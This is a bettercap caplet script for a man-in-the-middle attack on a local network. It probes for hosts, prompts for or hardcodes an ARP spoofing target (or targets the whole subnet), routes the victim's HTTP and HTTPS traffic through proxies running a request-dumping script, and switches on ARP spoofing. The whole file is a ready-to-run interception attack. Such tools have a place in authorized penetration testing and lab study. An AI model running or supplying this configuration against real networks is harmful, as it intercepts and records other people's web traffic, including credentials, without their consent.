#Usage: $ sudo bettercap -caplet http-req-dump.cap

# Hardcode a target.  Uncomment only if you comment out the dynamic setting, below
#set arp.spoof.targets 192.168.0.172

# Dynamically ask user for a target.  Comment out if you uncomment out the hardcoded setting, above.
read arp.spoof.targets Select the target to spoof:

# Alternately, you can comment out all of the above and targeting the whole subnet by default, 
#  or, to make it selective:
#   sudo ./bettercap -caplet http-req-dump.cap -eval "set arp.spoof.targets 192.168.1.64"

#########################################################################################

# to make it less verbose
# events.stream off

# discover a few hosts 
net.probe on
sleep 1
net.probe off

# uncomment to enable sniffing too
# set net.sniff.verbose false
# set net.sniff.local true
# set net.sniff.filter tcp port 443
# net.sniff on

# we'll use this proxy script to dump requests
set https.proxy.script http-req-dump.js
set http.proxy.script http-req-dump.js
clear

# go ^_^
http.proxy on
https.proxy on
arp.spoof on
